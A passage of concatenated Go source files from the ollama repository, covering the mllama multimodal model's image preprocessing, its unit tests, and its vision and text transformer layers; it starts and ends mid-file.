ml.Tensor if i == len(m.Layers)-1 { outputs = batch.Outputs } hiddenState = layer.Forward(ctx, hiddenState, positions, outputs, m.Cache, m, isSWA) } hiddenState = m.OutputNorm.Forward(ctx, hiddenState, m.eps) return m.Output.Forward(ctx, hiddenState), nil } func init() { model.Register("olmo3", New) }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/mllama/process_image.go
model/models/mllama/process_image.go
package mllama import ( "image" "math" "slices" "golang.org/x/image/draw" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/model/imageproc" ) type supportedAspectRatio struct { rank, width, height int } func (a supportedAspectRatio) Point() image.Point { return image.Point{a.width, a.height} } func (a supportedAspectRatio) numTiles() int { return a.width * a.height } type ImageProcessor struct { imageSize, numChannels, maxNumTiles int mean, std [3]float32 } func newImageProcessor(c fs.Config) ImageProcessor { return ImageProcessor{ imageSize: int(c.Uint("vision.image_size")), numChannels: int(c.Uint("vision.num_channels")), maxNumTiles: int(c.Uint("vision.max_num_tiles")), mean: imageproc.ClipDefaultMean, std: imageproc.ClipDefaultSTD, } } func (p ImageProcessor) supportedAspectRatios() (ratios []supportedAspectRatio) { for w := 1; w <= p.maxNumTiles; w++ { for h := 1; h <= p.maxNumTiles/w; h++ { ratios = append(ratios, supportedAspectRatio{len(ratios) + 1, w, h}) } } return ratios } func (p ImageProcessor) fitToCanvas(imageSize, canvasSize image.Point) image.Point { tw := min(max(imageSize.X, p.imageSize), canvasSize.X) th := min(max(imageSize.Y, p.imageSize), canvasSize.Y) r := min( float64(tw)/float64(imageSize.X), float64(th)/float64(imageSize.Y), ) w := min(int(math.Floor(float64(imageSize.X)*r)), tw) h := min(int(math.Floor(float64(imageSize.Y)*r)), th) return image.Point{w, h} } func (p ImageProcessor) optimalTiledCanvas(imageSize image.Point) image.Point { possibleTileArrangements := p.supportedAspectRatios() possibleCanvasSizes := make([]image.Point, len(possibleTileArrangements)) for i, pta := range possibleTileArrangements { possibleCanvasSizes[i] = image.Point{pta.width * p.imageSize, pta.height * p.imageSize} } scales := make([]float64, len(possibleCanvasSizes)) for i, pcs := range possibleCanvasSizes { scales[i] = min( float64(pcs.Y)/float64(imageSize.Y), float64(pcs.X)/float64(imageSize.X), ) } var minUpscale float64 var maxDownscale float64 var upscale bool for _, s := range scales { if s > 1.0 { upscale = true if minUpscale == 0 { minUpscale = s } else { minUpscale = min(minUpscale, s) } } else { maxDownscale = max(maxDownscale, s) } } selectedScale := maxDownscale if upscale { selectedScale = minUpscale } var selectedCanvas image.Point for n, pcs := range possibleCanvasSizes { if scales[n] == selectedScale { // choose the smallest possible canvas if selectedCanvas.X == 0 && selectedCanvas.Y == 0 { selectedCanvas = pcs } else if pcs.X*pcs.Y < selectedCanvas.X*selectedCanvas.Y { selectedCanvas = pcs } } } return selectedCanvas } func (p ImageProcessor) splitToTiles(img image.Image, numTilesSize image.Point) []image.Image { b := img.Bounds() width := b.Max.X - b.Min.X height := b.Max.Y - b.Min.Y tileHeight := height / numTilesSize.Y tileWidth := width / numTilesSize.X images := make([]image.Image, 0, numTilesSize.Y*numTilesSize.X) for h := range numTilesSize.Y { for w := range numTilesSize.X { rect := image.Rect(tileWidth*w, tileHeight*h, tileWidth*(w+1), tileHeight*(h+1)) if subImg, ok := img.(interface { SubImage(image.Rectangle) image.Image }); ok { images = append(images, subImg.SubImage(rect)) } else { // Handle the case where img does not implement SubImage // This is a fallback and may not be efficient newImg := image.NewRGBA(rect) draw.Draw(newImg, rect, img, rect.Min, draw.Src) images = append(images, newImg) } } } return images } func (p ImageProcessor) resize(img image.Image) (image.Image, image.Point) { b := img.Bounds() canvasSize := p.optimalTiledCanvas(b.Max) aspectRatio := image.Point{canvasSize.X / p.imageSize, canvasSize.Y / p.imageSize} newSize := p.fitToCanvas(b.Max, canvasSize) dst := image.NewRGBA(image.Rect(0, 0, newSize.X, newSize.Y)) // scaling choices: // NearestNeighbor fast, blocky output // ApproxBiLinear fast, medium quality // BiLinear slow, high quality // CatmullRom very slow, very high quality draw.BiLinear.Scale(dst, dst.Rect, img, b, draw.Over, nil) return dst, aspectRatio } func (p ImageProcessor) pad(img image.Image, aspectRatio image.Point) image.Image { paddedSize := image.Point{ X: p.imageSize * aspectRatio.X, Y: p.imageSize * aspectRatio.Y, } dst := image.NewRGBA(image.Rect(0, 0, paddedSize.X, paddedSize.Y)) draw.Draw(dst, img.Bounds(), img, image.Point{0, 0}, draw.Over) return dst } func (p ImageProcessor) pack(img image.Image, aspectRatio image.Point) []float32 { subImages := p.splitToTiles(img, aspectRatio) var pixelVals []float32 for _, subImg := range subImages { bounds := subImg.Bounds() var rVals, gVals, bVals []float32 for y := bounds.Min.Y; y < bounds.Max.Y; y++ { for x := bounds.Min.X; x < bounds.Max.X; x++ { c := subImg.At(x, y) r, g, b, _ := c.RGBA() rVal := float32(r>>8) / 255.0 gVal := float32(g>>8) / 255.0 bVal := float32(b>>8) / 255.0 rVal = (rVal - p.mean[0]) / p.std[0] gVal = (gVal - p.mean[1]) / p.std[1] bVal = (bVal - p.mean[2]) / p.std[2] rVals = append(rVals, rVal) gVals = append(gVals, gVal) bVals = append(bVals, bVal) } } pixelVals = append(pixelVals, rVals...) pixelVals = append(pixelVals, gVals...) pixelVals = append(pixelVals, bVals...) } return pixelVals } func (p ImageProcessor) ProcessImage(img image.Image) ([]float32, supportedAspectRatio, error) { newImage, newImageRatio := p.resize(img) newImage = p.pad(newImage, newImageRatio) pixelValues := p.pack(newImage, newImageRatio) supportedAspectRatios := p.supportedAspectRatios() aspectRatioID := slices.IndexFunc(supportedAspectRatios, func(i supportedAspectRatio) bool { return i.width == newImageRatio.X && i.height == newImageRatio.Y }) return pixelValues, supportedAspectRatios[aspectRatioID], nil }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/mllama/process_image_test.go
model/models/mllama/process_image_test.go
package mllama import ( "image" "testing" "github.com/google/go-cmp/cmp" ) func TestSupportedAspectRatios(t *testing.T) { cases := []struct { p ImageProcessor want []supportedAspectRatio }{ { p: ImageProcessor{maxNumTiles: 1}, want: []supportedAspectRatio{ {1, 1, 1}, }, }, { p: ImageProcessor{maxNumTiles: 2}, want: []supportedAspectRatio{ {1, 1, 1}, {2, 1, 2}, {3, 2, 1}, }, }, { p: ImageProcessor{maxNumTiles: 3}, want: []supportedAspectRatio{ {1, 1, 1}, {2, 1, 2}, {3, 1, 3}, {4, 2, 1}, {5, 3, 1}, }, }, { p: ImageProcessor{maxNumTiles: 4}, want: []supportedAspectRatio{ {1, 1, 1}, {2, 1, 2}, {3, 1, 3}, {4, 1, 4}, {5, 2, 1}, {6, 2, 2}, {7, 3, 1}, {8, 4, 1}, }, }, } for _, tt := range cases { actual := tt.p.supportedAspectRatios() if diff := cmp.Diff(actual, tt.want, cmp.AllowUnexported(supportedAspectRatio{})); diff != "" { t.Errorf("mismatch (-got +want):\n%s", diff) } } } func TestFitToCanvas(t *testing.T) { cases := []struct { p ImageProcessor image image.Point canvas image.Point expect image.Point }{ { p: ImageProcessor{imageSize: 200}, image: image.Point{400, 400}, canvas: image.Point{640, 480}, expect: image.Point{400, 400}, }, { p: ImageProcessor{imageSize: 200}, image: image.Point{1024, 768}, canvas: image.Point{640, 480}, expect: image.Point{640, 480}, }, { p: ImageProcessor{imageSize: 750}, image: image.Point{500, 500}, canvas: image.Point{1000, 1000}, expect: image.Point{750, 750}, }, { p: ImageProcessor{imageSize: 2000}, image: image.Point{500, 1000}, canvas: image.Point{2000, 2000}, expect: image.Point{1000, 2000}, }, { p: ImageProcessor{imageSize: 1000}, image: image.Point{4000, 3000}, canvas: image.Point{2000, 1000}, expect: image.Point{1333, 1000}, }, { p: ImageProcessor{imageSize: 560}, image: image.Point{667, 1000}, canvas: image.Point{1000, 1000}, expect: image.Point{667, 1000}, }, } for _, tt := range cases { actual := tt.p.fitToCanvas(tt.image, tt.canvas) if diff := cmp.Diff(actual, tt.expect); diff != "" { t.Errorf("mismatch (-got +want):\n%s", diff) } } } func TestOptimalTiledCanvas(t *testing.T) { cases := []struct { p ImageProcessor image image.Point expect image.Point }{ { p: ImageProcessor{maxNumTiles: 4, imageSize: 1000}, image: image.Point{1024, 768}, expect: image.Point{2000, 1000}, }, { p: ImageProcessor{maxNumTiles: 4, imageSize: 560}, image: image.Point{1024, 768}, expect: image.Point{1120, 1120}, }, { p: ImageProcessor{maxNumTiles: 4, imageSize: 560}, image: image.Point{800, 600}, expect: image.Point{1120, 1120}, }, { p: ImageProcessor{maxNumTiles: 4, imageSize: 560}, image: image.Point{640, 480}, expect: image.Point{1120, 560}, }, { p: ImageProcessor{maxNumTiles: 4, imageSize: 560}, image: image.Point{320, 200}, expect: image.Point{560, 560}, }, { p: ImageProcessor{maxNumTiles: 4, imageSize: 560}, image: image.Point{1320, 200}, expect: image.Point{1680, 560}, }, { p: ImageProcessor{maxNumTiles: 4, imageSize: 560}, image: image.Point{2000, 200}, expect: image.Point{2240, 560}, }, { p: ImageProcessor{maxNumTiles: 4, imageSize: 560}, image: image.Point{10000, 200}, expect: image.Point{2240, 560}, }, { p: ImageProcessor{maxNumTiles: 4, imageSize: 560}, image: image.Point{480, 640}, expect: image.Point{560, 1120}, }, { p: ImageProcessor{maxNumTiles: 4, imageSize: 560}, image: image.Point{200, 320}, expect: image.Point{560, 560}, }, { p: ImageProcessor{maxNumTiles: 4, imageSize: 560}, image: image.Point{200, 1320}, expect: image.Point{560, 1680}, }, { p: ImageProcessor{maxNumTiles: 4, imageSize: 560}, image: image.Point{200, 2000}, expect: image.Point{560, 2240}, }, { p: ImageProcessor{maxNumTiles: 4, imageSize: 560}, image: image.Point{200, 10000}, expect: image.Point{560, 2240}, }, { p: ImageProcessor{maxNumTiles: 4, imageSize: 560}, image: image.Point{10000, 10000}, expect: image.Point{1120, 1120}, }, } for _, tt := range cases { actual := tt.p.optimalTiledCanvas(tt.image) if diff := cmp.Diff(actual, tt.expect); diff != "" { t.Errorf("mismatch (-got +want):\n%s", diff) } } } func TestSplitToTiles(t *testing.T) { cases := []struct { imageMax image.Point numTiles image.Point expect []image.Image }{ { imageMax: image.Point{1024, 768}, numTiles: image.Point{1, 1}, expect: []image.Image{image.NewRGBA(image.Rect(0, 0, 1024, 768))}, }, { imageMax: image.Point{1000, 500}, numTiles: image.Point{2, 1}, expect: []image.Image{ image.NewRGBA(image.Rect(0, 0, 500, 500)), image.NewRGBA(image.Rect(500, 0, 1000, 500)), }, }, { imageMax: image.Point{1000, 1000}, numTiles: image.Point{2, 2}, expect: []image.Image{ image.NewRGBA(image.Rect(0, 0, 500, 500)), image.NewRGBA(image.Rect(500, 0, 1000, 500)), image.NewRGBA(image.Rect(0, 500, 500, 1000)), image.NewRGBA(image.Rect(500, 500, 1000, 1000)), }, }, } var p ImageProcessor for _, tt := range cases { actual := p.splitToTiles(image.NewRGBA(image.Rectangle{Max: tt.imageMax}), tt.numTiles) if len(actual) != len(tt.expect) { t.Errorf("incorrect number of images '%d': expect: '%d'", len(actual), len(tt.expect)) } for i := range actual { if actual[i].Bounds() != tt.expect[i].Bounds() { t.Errorf("image size incorrect: '%#v': expect: '%#v'", actual[i].Bounds(), tt.expect[i].Bounds()) } } } } func TestResize(t *testing.T) { cases := []struct { p ImageProcessor imageMax image.Point expectImage image.Image expectAspectRatio image.Point }{ { p: ImageProcessor{maxNumTiles: 1, imageSize: 100}, imageMax: image.Point{200, 200}, expectImage: image.NewRGBA(image.Rect(0, 0, 100, 100)), expectAspectRatio: image.Point{1, 1}, }, { p: ImageProcessor{maxNumTiles: 2, imageSize: 100}, imageMax: image.Point{200, 200}, expectImage: image.NewRGBA(image.Rect(0, 0, 100, 100)), expectAspectRatio: image.Point{1, 1}, }, { p: ImageProcessor{maxNumTiles: 4, imageSize: 560}, imageMax: image.Point{10, 10}, expectImage: image.NewRGBA(image.Rect(0, 0, 560, 560)), expectAspectRatio: image.Point{1, 1}, }, { p: ImageProcessor{maxNumTiles: 4, imageSize: 560}, imageMax: image.Point{2560, 1920}, expectImage: image.NewRGBA(image.Rect(0, 0, 1120, 840)), expectAspectRatio: image.Point{2, 2}, }, { p: ImageProcessor{maxNumTiles: 4, imageSize: 560}, imageMax: image.Point{1024, 768}, expectImage: image.NewRGBA(image.Rect(0, 0, 1024, 768)), expectAspectRatio: image.Point{2, 2}, }, } for _, tt := range cases { actualImage, actualAspectRatio := tt.p.resize(image.Rectangle{Max: tt.imageMax}) if actualImage.Bounds() != tt.expectImage.Bounds() { t.Errorf("image size incorrect: '%#v': expect: '%#v'", actualImage.Bounds(), tt.expectImage.Bounds()) } if actualAspectRatio != tt.expectAspectRatio { t.Errorf("aspect ratio incorrect: '%#v': expect: '%#v'", actualAspectRatio, tt.expectAspectRatio) } } } func TestPad(t *testing.T) { cases := []struct { p ImageProcessor imageMax image.Point aspectRatio image.Point expect image.Image }{ { p: ImageProcessor{maxNumTiles: 4, imageSize: 560}, imageMax: image.Point{1000, 667}, aspectRatio: image.Point{2, 2}, expect: image.NewRGBA(image.Rect(0, 0, 1120, 1120)), }, } for _, tt := range cases { actual := tt.p.pad(image.Rectangle{Max: tt.imageMax}, tt.aspectRatio) if actual.Bounds() != tt.expect.Bounds() { t.Errorf("image size incorrect: '%#v': expect: '%#v'", actual.Bounds(), tt.expect.Bounds()) } } } func TestPackImages(t *testing.T) { cases := []struct { imageMax image.Point aspectRatio image.Point expectVals int }{ { imageMax: image.Point{1120, 1120}, aspectRatio: image.Point{2, 2}, expectVals: 2 * 2 * 3 * 560 * 560, }, { imageMax: image.Point{560, 560}, aspectRatio: image.Point{1, 1}, expectVals: 1 * 1 * 3 * 560 * 560, }, { imageMax: image.Point{1120, 560}, aspectRatio: image.Point{1, 2}, expectVals: 1 * 2 * 3 * 560 * 560, }, } for _, tt := range cases { var p ImageProcessor actualVals := p.pack(image.NewRGBA(image.Rectangle{Max: tt.imageMax}), tt.aspectRatio) if len(actualVals) != tt.expectVals { t.Errorf("packed image size incorrect: '%d': expect: '%d'", len(actualVals), tt.expectVals) } } } func TestPreprocess(t *testing.T) { cases := []struct { imageMax image.Point expectAspectRatioID int }{ { imageMax: image.Point{10, 10}, expectAspectRatioID: 1, }, { imageMax: image.Point{1024, 768}, expectAspectRatioID: 6, }, } p := ImageProcessor{imageSize: 560, maxNumTiles: 4} for _, tt := range cases { img, aspectRatio, err := p.ProcessImage(image.NewRGBA(image.Rectangle{Max: tt.imageMax})) if err != nil { t.Fatalf("error processing: %q", err) } if len(img) == 0 { t.Errorf("no image data returned") } if aspectRatio.rank != tt.expectAspectRatioID { t.Errorf("aspect ratio incorrect: '%d': expect: '%d'", aspectRatio, tt.expectAspectRatioID) } } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/mllama/model.go
model/models/mllama/model.go
package mllama import ( "bytes" "image" "slices" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/kvcache" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" "github.com/ollama/ollama/model" "github.com/ollama/ollama/model/input" ) type Model struct { model.Base model.BytePairEncoding *VisionModel `gguf:"v"` *TextModel Projector *nn.Linear `gguf:"mm.0"` ImageProcessor } const ( crossAttentionLayer = iota selfAttentionLayer ) func New(c fs.Config) (model.Model, error) { m := Model{ BytePairEncoding: model.NewBytePairEncoding( &model.Vocabulary{ Values: c.Strings("tokenizer.ggml.tokens"), Types: c.Ints("tokenizer.ggml.token_type"), Merges: c.Strings("tokenizer.ggml.merges"), AddBOS: c.Bool("tokenizer.ggml.add_bos_token", true), BOS: []int32{int32(c.Uint("tokenizer.ggml.bos_token_id"))}, AddEOS: c.Bool("tokenizer.ggml.add_eos_token", false), EOS: append( []int32{int32(c.Uint("tokenizer.ggml.eos_token_id"))}, c.Ints("tokenizer.ggml.eos_token_ids")..., ), }, `(?i:'s|'t|'re|'ve|'m|'ll|'d)|[^\r\n\p{L}\p{N}]?\p{L}+|\p{N}{1,3}| ?[^\s\p{L}\p{N}]+[\r\n]*|\s*[\r\n]+|\s+(?!\S)|\s+`, ), ImageProcessor: newImageProcessor(c), VisionModel: newVisionModel(c), TextModel: newTextModel(c), } encoderCache := kvcache.NewEncoderCache() encoderCache.SetConfig(ml.CacheConfig{}) m.Cache = kvcache.NewWrapperCache(encoderCache, kvcache.NewCausalCache(m.TextModel.Shift)) return &m, nil } func (m *Model) EncodeMultimodal(ctx ml.Context, multimodalData []byte) ([]input.Multimodal, error) { if len(m.VisionModel.Transformer.Layers) == 0 || len(m.GlobalTransformer.Layers) == 0 { return nil, model.ErrNoVisionModel } image, _, err := image.Decode(bytes.NewReader(multimodalData)) if err != nil { return nil, err } f32s, ratio, err := m.ImageProcessor.ProcessImage(image) if err != nil { return nil, err } if ratio.numTiles() < m.maxNumTiles { // Pad tiles to maxNumTiles f32s = slices.Grow(f32s, m.imageSize*m.imageSize*m.numChannels*m.maxNumTiles) f32s = f32s[:m.imageSize*m.imageSize*m.numChannels*m.maxNumTiles] } pixelValues := ctx.Input().FromFloats(f32s, m.imageSize, m.imageSize, m.numChannels, m.maxNumTiles) aspectRatio := ctx.Input().FromInts([]int32{int32(ratio.rank)}, 1) positionIDs := ctx.Arange(0, 1601, 1, ml.DTypeI32) crossAttentionStates := m.VisionModel.Forward(ctx, pixelValues, positionIDs, aspectRatio) projectedOutputs := m.Projector.Forward(ctx, crossAttentionStates) return []input.Multimodal{{Tensor: projectedOutputs}}, nil } func (m *Model) PostTokenize(inputs []*input.Input) ([]*input.Input, error) { for i := range inputs { if inputs[i].Multimodal != nil { inputs[i].Token = 128256 // <|image|> } } return inputs, nil } func (m *Model) Forward(ctx ml.Context, batch input.Batch) (ml.Tensor, error) { var crossAttentionStates ml.Tensor if len(batch.Multimodal) > 0 { crossAttentionStates = batch.Multimodal[len(batch.Multimodal)-1].Multimodal[0].Tensor } positions := ctx.Input().FromInts(batch.Positions, len(batch.Positions)) // TODO: attention mask, cross attention mask return m.TextModel.Forward(ctx, batch.Inputs, positions, batch.Outputs, crossAttentionStates, nil, m.Cache.(*kvcache.WrapperCache)), nil } func init() { model.Register("mllama", New) }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/mllama/model_vision.go
model/models/mllama/model_vision.go
package mllama import ( "math" "slices" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" ) var batchSize int = 1 type VisionSelfAttention struct { Query *nn.Linear `gguf:"attn_q"` Key *nn.Linear `gguf:"attn_k"` Value *nn.Linear `gguf:"attn_v"` Output *nn.Linear `gguf:"attn_output"` } func (sa *VisionSelfAttention) Forward(ctx ml.Context, hiddenState ml.Tensor, opts *VisionModelOptions) ml.Tensor { headDim := opts.hiddenSize / opts.numHeads query := sa.Query.Forward(ctx, hiddenState) query = query.Reshape(ctx, headDim, opts.numHeads, query.Dim(1), batchSize) key := sa.Key.Forward(ctx, hiddenState) key = key.Reshape(ctx, headDim, opts.numHeads, key.Dim(1), batchSize) value := sa.Value.Forward(ctx, hiddenState) value = value.Reshape(ctx, headDim, opts.numHeads, value.Dim(1), batchSize) attention := nn.Attention(ctx, query, key, value, 1./math.Sqrt(float64(headDim)), nil) attention = attention.Reshape(ctx, opts.hiddenSize, attention.Dim(2), batchSize) return sa.Output.Forward(ctx, attention) } type VisionMLP struct { Up *nn.Linear `gguf:"ffn_up"` Down *nn.Linear `gguf:"ffn_down"` } func (mlp *VisionMLP) Forward(ctx ml.Context, hiddenState ml.Tensor, opts *VisionModelOptions) ml.Tensor { hiddenState = mlp.Up.Forward(ctx, hiddenState).GELU(ctx) hiddenState = mlp.Down.Forward(ctx, hiddenState) return hiddenState } type VisionEncoderLayer struct { AttentionNorm *nn.LayerNorm `gguf:"attn_norm"` SelfAttention *VisionSelfAttention AttentionGate ml.Tensor `gguf:"attn_gate"` MLPNorm *nn.LayerNorm `gguf:"ffn_norm"` MLP *VisionMLP MLPGate ml.Tensor `gguf:"ffn_gate"` } func (e *VisionEncoderLayer) Forward(ctx ml.Context, hiddenState ml.Tensor, opts *VisionModelOptions) ml.Tensor { residual := hiddenState // self attention hiddenState = e.AttentionNorm.Forward(ctx, hiddenState, opts.eps) hiddenState = e.SelfAttention.Forward(ctx, hiddenState, opts) if e.AttentionGate != nil { hiddenState = hiddenState.Mul(ctx, e.AttentionGate) } hiddenState = hiddenState.Add(ctx, residual) residual = hiddenState hiddenState = e.MLPNorm.Forward(ctx, hiddenState, opts.eps) hiddenState = e.MLP.Forward(ctx, hiddenState, opts) if e.MLPGate != nil { hiddenState = hiddenState.Mul(ctx, e.MLPGate) } hiddenState = hiddenState.Add(ctx, residual) return hiddenState } type VisionEncoder struct { Layers []VisionEncoderLayer } func (e *VisionEncoder) Forward(ctx ml.Context, hiddenState ml.Tensor, intermediateLayersIndices []int32, opts *VisionModelOptions) (ml.Tensor, []ml.Tensor) { var intermediateHiddenStates []ml.Tensor for i, layer := range e.Layers { if slices.Contains(intermediateLayersIndices, int32(i)) { intermediateHiddenStates = append(intermediateHiddenStates, hiddenState.Reshape(ctx, append([]int{1}, hiddenState.Shape()...)...)) } hiddenState = layer.Forward(ctx, hiddenState, opts) } return hiddenState, intermediateHiddenStates } type PrecomputedAspectRatioEmbedding struct { Embedding *nn.Embedding Gate ml.Tensor `gguf:"gate"` } func (e *PrecomputedAspectRatioEmbedding) Forward(ctx ml.Context, hiddenState ml.Tensor, aspectRatioIDs ml.Tensor, numTiles int, opts *VisionModelOptions) ml.Tensor { embeddings := e.Embedding.Forward(ctx, aspectRatioIDs) embeddings = embeddings.Reshape(ctx, opts.hiddenSize, 1, numTiles) if e.Gate != nil { embeddings = embeddings.Mul(ctx, e.Gate) } return hiddenState.Add(ctx, embeddings) } type PrecomputedPositionEmbedding struct { PositionEmbedding *nn.Embedding `gguf:"position_embd"` PositionEmbeddingGate ml.Tensor `gguf:"position_embd.gate"` TilePositionEmbedding *nn.Embedding `gguf:"tile_position_embd"` TilePositionEmbeddingGate ml.Tensor `gguf:"tile_position_embd.gate"` } func (e *PrecomputedPositionEmbedding) Forward(ctx ml.Context, hiddenState, positionIDs, aspectRatioIDs ml.Tensor, numPositions, numTiles int, opts *VisionModelOptions) ml.Tensor { positionEmbedding := e.PositionEmbedding.Forward(ctx, positionIDs) if e.PositionEmbeddingGate != nil { positionEmbedding = positionEmbedding.Mul(ctx, e.PositionEmbeddingGate) } hiddenState = hiddenState.Add(ctx, positionEmbedding) tilePositionEmbedding := e.TilePositionEmbedding.Forward(ctx, aspectRatioIDs) tilePositionEmbedding = tilePositionEmbedding.Reshape(ctx, opts.hiddenSize, numPositions, numTiles) if e.TilePositionEmbeddingGate != nil { tilePositionEmbedding = tilePositionEmbedding.Mul(ctx, e.TilePositionEmbeddingGate) } return hiddenState.Add(ctx, tilePositionEmbedding) } type VisionModelOptions struct { hiddenSize, numHeads int imageSize, patchSize int eps float32 intermediateLayersIndices []int32 } type VisionModel struct { PatchEmbeddings *nn.Conv2D `gguf:"patch_embd"` PreTilePositionEmbedding *PrecomputedAspectRatioEmbedding `gguf:"pre_tile_position_embd"` PostTilePositionEmbedding *PrecomputedAspectRatioEmbedding `gguf:"post_tile_position_embd"` PositionEmbedding *PrecomputedPositionEmbedding PreLayerNorm *nn.LayerNorm `gguf:"pre_ln"` PostLayerNorm *nn.LayerNorm `gguf:"post_ln"` ClassEmbedding ml.Tensor `gguf:"class_embd"` Transformer *VisionEncoder `gguf:"blk"` GlobalTransformer *VisionEncoder `gguf:"global.blk"` *VisionModelOptions } func (m *VisionModel) Forward(ctx ml.Context, pixelValues, positionIDs, aspectRatioIDs ml.Tensor) ml.Tensor { numPatches := (m.imageSize / m.patchSize) * (m.imageSize / m.patchSize) numPositions := numPatches if m.ClassEmbedding != nil { numPositions++ } numTiles := pixelValues.Dim(3) hiddenState := m.PatchEmbeddings.Forward(ctx, pixelValues, m.patchSize, m.patchSize, 0, 0, 1, 1) hiddenState = hiddenState.Reshape(ctx, numPatches, m.hiddenSize, numTiles) hiddenState = hiddenState.Permute(ctx, 1, 0, 2, 3).Contiguous(ctx) hiddenState = m.PreTilePositionEmbedding.Forward(ctx, hiddenState, aspectRatioIDs, numTiles, m.VisionModelOptions) hiddenState = m.ClassEmbedding.Repeat(ctx, 2, numTiles).Concat(ctx, hiddenState, 1) hiddenState = m.PositionEmbedding.Forward(ctx, hiddenState, positionIDs, aspectRatioIDs, numPositions, numTiles, m.VisionModelOptions) hiddenState = m.PreLayerNorm.Forward(ctx, hiddenState, m.eps) numPaddingPatches := 8 - (hiddenState.Dim(1)%8)%8 hiddenState = hiddenState.Pad(ctx, 0, numPaddingPatches, 0, 0) hiddenState = hiddenState.Reshape(ctx, hiddenState.Dim(0), hiddenState.Dim(1)*hiddenState.Dim(2), batchSize) hiddenState, intermediateHiddenStates := m.Transformer.Forward(ctx, hiddenState, m.intermediateLayersIndices, m.VisionModelOptions) hiddenState = m.PostLayerNorm.Forward(ctx, hiddenState, m.eps) hiddenState = hiddenState.Reshape(ctx, m.hiddenSize, numPositions+numPaddingPatches, numTiles, batchSize) hiddenState = m.PostTilePositionEmbedding.Forward(ctx, hiddenState, aspectRatioIDs, numTiles, m.VisionModelOptions) hiddenState = hiddenState.Reshape(ctx, m.hiddenSize, numTiles*(numPositions+numPaddingPatches), batchSize) hiddenState, _ = m.GlobalTransformer.Forward(ctx, hiddenState, nil, m.VisionModelOptions) hiddenStates := intermediateHiddenStates[0].Stack(ctx, 0, intermediateHiddenStates[1:]...) hiddenStates = hiddenStates.Reshape(ctx, len(intermediateHiddenStates)*m.hiddenSize, numPositions+numPaddingPatches, numTiles, batchSize) hiddenStates = hiddenStates.Pad(ctx, 0, -numPaddingPatches, 0, 0) hiddenState = hiddenState.Reshape(ctx, m.hiddenSize, numPositions+numPaddingPatches, numTiles, batchSize) hiddenState = hiddenState.Pad(ctx, 0, -numPaddingPatches, 0, 0) return hiddenState.Concat(ctx, hiddenStates, 0) } func newVisionModel(c fs.Config) *VisionModel { return &VisionModel{ Transformer: &VisionEncoder{Layers: make([]VisionEncoderLayer, c.Uint("vision.block_count"))}, GlobalTransformer: &VisionEncoder{Layers: make([]VisionEncoderLayer, c.Uint("vision.global.block_count"))}, VisionModelOptions: &VisionModelOptions{ hiddenSize: int(c.Uint("vision.embedding_length")), numHeads: int(c.Uint("vision.attention.head_count")), imageSize: int(c.Uint("vision.image_size")), patchSize: int(c.Uint("vision.patch_size")), eps: c.Float("vision.attention.layer_norm_epsilon"), intermediateLayersIndices: c.Ints("vision.intermediate_layers_indices"), }, } }
go
MIT
626af2d80973270c4d59b8df7153ac47ad67ed7b
2026-01-07T08:35:43.337630Z
false
ollama/ollama
https://github.com/ollama/ollama/blob/626af2d80973270c4d59b8df7153ac47ad67ed7b/model/models/mllama/model_text.go
model/models/mllama/model_text.go
package mllama import ( "math" "slices" "github.com/ollama/ollama/fs" "github.com/ollama/ollama/kvcache" "github.com/ollama/ollama/ml" "github.com/ollama/ollama/ml/nn" "github.com/ollama/ollama/ml/nn/rope" ) type TextSelfAttention struct { Query *nn.Linear `gguf:"attn_q"` Key *nn.Linear `gguf:"attn_k"` Value *nn.Linear `gguf:"attn_v"` Output *nn.Linear `gguf:"attn_output"` RopeFactors ml.Tensor `gguf:"rope_freqs.weight"` } func (sa *TextSelfAttention) Forward(ctx ml.Context, hiddenState, positions ml.Tensor, cache *kvcache.WrapperCache, opts *TextModelOptions) ml.Tensor { batchSize := hiddenState.Dim(1) headDim := opts.hiddenSize / opts.numHeads query := sa.Query.Forward(ctx, hiddenState) query = query.Reshape(ctx, headDim, opts.numHeads, batchSize) query = opts.applyRotaryPositionEmbeddings(ctx, query, positions, sa.RopeFactors) key := sa.Key.Forward(ctx, hiddenState) key = key.Reshape(ctx, headDim, opts.numKVHeads, batchSize) key = opts.applyRotaryPositionEmbeddings(ctx, key, positions, sa.RopeFactors) value := sa.Value.Forward(ctx, hiddenState) value = value.Reshape(ctx, headDim, opts.numKVHeads, batchSize) scaleFactor := 1.0 / math.Sqrt(float64(headDim)) attention := nn.Attention(ctx, query, key, value, scaleFactor, cache) attention = attention.Reshape(ctx, opts.hiddenSize, batchSize) return sa.Output.Forward(ctx, attention) } func (m *TextModel) Shift(ctx ml.Context, layer int, key, shift ml.Tensor) (ml.Tensor, error) { // This will only get called for layers in the cache, which are just the self attention layers if layer, ok := m.Transformer.Layers[layer].(*TextSelfAttentionDecoderLayer); ok { return m.applyRotaryPositionEmbeddings(ctx, key, shift, layer.SelfAttention.RopeFactors), nil } return key, nil } type TextMLP struct { Up *nn.Linear `gguf:"ffn_up"` Down *nn.Linear `gguf:"ffn_down"` Gate *nn.Linear `gguf:"ffn_gate"` } func (mlp *TextMLP) Forward(ctx ml.Context, hiddenState ml.Tensor, opts *TextModelOptions) ml.Tensor { hiddenState = mlp.Gate.Forward(ctx, hiddenState).SILU(ctx, mlp.Up.Forward(ctx, hiddenState)) return mlp.Down.Forward(ctx, hiddenState) } type TextSelfAttentionDecoderLayer struct { AttentionNorm *nn.RMSNorm `gguf:"attn_norm"` SelfAttention *TextSelfAttention MLPNorm *nn.RMSNorm 